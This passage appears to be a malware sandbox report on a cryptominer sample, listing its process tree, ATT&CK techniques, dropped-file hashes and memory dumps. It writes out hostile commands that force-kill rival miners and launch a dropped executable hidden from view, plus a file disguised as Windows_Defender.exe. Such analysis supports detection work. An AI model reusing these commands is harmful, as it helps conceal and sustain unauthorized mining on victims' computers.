"cmd" "/c taskkill /im xmr-stak.exe /f"
2⤵
- Suspicious use of WriteProcessMemory
PID:1108

C:\Windows\system32\taskkill.exe
taskkill /im xmr-stak.exe /f"
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:304

C:\Windows\system32\cmd.exe
"cmd" "/c taskkill /im asmhfn.exe /f"
2⤵
- Suspicious use of WriteProcessMemory
PID:1092

C:\Windows\system32\taskkill.exe
taskkill /im asmhfn.exe /f"
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:332

C:\Windows\system32\cmd.exe
"cmd" "/c taskkill /im pamguam.exe /f"
2⤵
- Suspicious use of WriteProcessMemory
PID:1304

C:\Windows\system32\taskkill.exe
taskkill /im pamguam.exe /f"
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:320

C:\Windows\system32\cmd.exe
"cmd" "/c taskkill /im xmrig.exe /f"
2⤵
- Suspicious use of WriteProcessMemory
PID:1572

C:\Windows\system32\taskkill.exe
taskkill /im xmrig.exe /f"
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "(Get-Process | Where-Object {$_.Name -eq 'zxmcjdm'}).count"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "start-process C:\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe -WindowStyle hidden"
2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2040

C:\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe
"C:\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "(Get-Process | Where-Object {$_.Name -eq 'Windows_Defender'}).count"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2292

C:\Windows\system32\cmd.exe
"cmd" "/c taskkill /im zzmsahbg.exe /f"
2⤵
PID:2528

C:\Windows\system32\taskkill.exe
taskkill /im zzmsahbg.exe /f"
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2336

C:\Windows\system32\cmd.exe
"cmd" "/c taskkill /im xmr-stak.exe /f"
2⤵
PID:1924

C:\Windows\system32\taskkill.exe
taskkill /im xmr-stak.exe /f"
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2936

C:\Windows\system32\cmd.exe
"cmd" "/c taskkill /im asmhfn.exe /f"
2⤵
PID:2396

C:\Windows\system32\taskkill.exe
taskkill /im asmhfn.exe /f"
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2444

C:\Windows\system32\cmd.exe
"cmd" "/c taskkill /im pamguam.exe /f"
2⤵
PID:1208

C:\Windows\system32\taskkill.exe
taskkill /im pamguam.exe /f"
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2744

C:\Windows\system32\cmd.exe
"cmd" "/c taskkill /im xmrig.exe /f"
2⤵
PID:2504

C:\Windows\system32\taskkill.exe
taskkill /im xmrig.exe /f"
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "(Get-Process | Where-Object {$_.Name -eq 'zxmcjdm'}).count"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "start-process C:\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe -WindowStyle hidden"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2000

C:\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe
"C:\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2108

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar1EBE.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Administrator\Appdata\Local\Temp\Windows\Windows_Defender.exe
Filesize
5.2MB

MD5
1f1f27deffe539d99e12d720f1fbd7da

SHA1
a021497f416dded6636e88d8955a3a7632fbfcf2

SHA256
7ece8e0973bdd09081b496e90d84e88152a60bfdd98123372fc3aed1c9d49863

SHA512
2c4f8b7cf581a3ca57d7463e410a9f58bb484fef0708f15106db4c1601ebda739eef5bde96bad48e38367d53637a3deac94443d6fbf8b3d907b8838e054b1522

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe
Filesize
3.1MB

MD5
94484839cf6f9765088e03271330ef26

SHA1
a9417b34c5d13354bd61b950142f47d7b92db6c1

SHA256
a7b71f6801c97c20677b4f5f54f77e69eb05108dc38ab67ac81a19338dfb3a65

SHA512
c434246af68785db332019ef0aac9e90678d9ca94c1ca9bf2a65a08803854843eae5e1da1b53565af831f3f20f54d24b0c7592c34535ad0888ee2c2e44149ac0

Download Submit
memory/808-53-0x000007FEF5AD0000-0x000007FEF646D000-memory.dmp

Filesize
9.6MB

Download
memory/808-54-0x0000000001E60000-0x0000000001EE0000-memory.dmp

Filesize
512KB

Download
memory/808-55-0x000007FEF5AD0000-0x000007FEF646D000-memory.dmp

Filesize
9.6MB

Download
memory/808-56-0x0000000001E60000-0x0000000001EE0000-memory.dmp

Filesize
512KB

Download
memory/808-57-0x0000000001E60000-0x0000000001EE0000-memory.dmp

Filesize
512KB

Download
memory/808-58-0x000007FEF5AD0000-0x000007FEF646D000-memory.dmp

Filesize
9.6MB

Download
memory/1544-117-0x0000000000230000-0x0000000000234000-memory.dmp

Filesize
16KB

Download
memory/1544-105-0x0000000000270000-0x0000000000274000-memory.dmp

Filesize
16KB

Download
memory/1544-104-0x0000000000250000-0x0000000000254000-memory.dmp

Filesize
16KB

Download
memory/1544-103-0x0000000000220000-0x0000000000224000-memory.dmp

Filesize
16KB

Download
memory/1544-89-0x0000000000230000-0x0000000000234000-memory.dmp

Filesize
16KB

Download
memory/1544-102-0x0000000000280000-0x0000000000284000-memory.dmp

Filesize
16KB

Download
memory/1544-101-0x0000000000260000-0x0000000000264000-memory.dmp

Filesize
16KB

Download
memory/1544-99-0x0000000000240000-0x0000000000244000-memory.dmp

Filesize
16KB

Download
memory/1544-100-0x00000000002A0000-0x00000000002A4000-memory.dmp

Filesize
16KB

Download
memory/1544-78-0x0000000000210000-0x0000000000220000-memory.dmp

Filesize
64KB

Download
memory/1700-10-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/1700-5-0x00000000022E0000-0x00000000022E8000-memory.dmp

Filesize
32KB

Download
memory/1700-4-0x000000001B1A0000-0x000000001B482000-memory.dmp

Filesize
2.9MB

Download
memory/1700-6-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/1700-11-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/1700-7-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/1700-12-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/1700-9-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/1700-8-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2024-48-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/2024-51-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Filesize
9.6MB

Download
memory/2024-50-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/2024-49-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/2024-45-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Filesize
9.6MB

Download
memory/2024-46-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/2024-47-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Filesize
9.6MB

Download
memory/2040-64-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/2040-59-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2040-68-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2040-67-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/2040-66-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/2040-61-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2040-60-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/2292-120-0x0000000002770000-0x00000000027F0000-memory.dmp

Filesize
512KB

Download
memory/2292-119-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp

Filesize
9.6MB

Download
memory/2460-38-0x000000000272B000-0x0000000002792000-memory.dmp

Filesize
412KB

Download
memory/2460-35-0x0000000002720000-0x00000000027A0000-memory.dmp

Filesize
512KB

Download
memory/2460-42-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2460-29-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2460-30-0x0000000002720000-0x00000000027A0000-memory.dmp

Filesize
512KB

Download
memory/2460-32-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-23-0x0000000002560000-0x00000000025E0000-memory.dmp

Filesize
512KB

Download
memory/2548-20-0x00000000003F0000-0x00000000003F8000-memory.dmp

Filesize
32KB

Download
memory/2548-18-0x000000001B0E0000-0x000000001B3C2000-memory.dmp

Filesize
2.9MB

Download
memory/2548-19-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-21-0x0000000002560000-0x00000000025E0000-memory.dmp

Filesize
512KB

Download
memory/2548-22-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-24-0x0000000002560000-0x00000000025E0000-memory.dmp

Filesize
512KB

Download
memory/2548-26-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-25-0x0000000002560000-0x00000000025E0000-memory.dmp

Filesize
512KB

Download
memory/2580-37-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2580-43-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2580-40-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2580-41-0x0000000002590000-0x0000000002610000-memory.dmp

Filesize
512KB

Download
memory/2580-39-0x0000000002590000-0x0000000002610000-memory.dmp

Filesize
512KB

Download
memory/2588-36-0x00000000025BB000-0x0000000002622000-memory.dmp

Filesize
412KB

Download
memory/2588-34-0x00000000025B0000-0x0000000002630000-memory.dmp

Filesize
512KB

Download
memory/2588-33-0x00000000025B0000-0x0000000002630000-memory.dmp

Filesize
512KB

Download
memory/2588-31-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download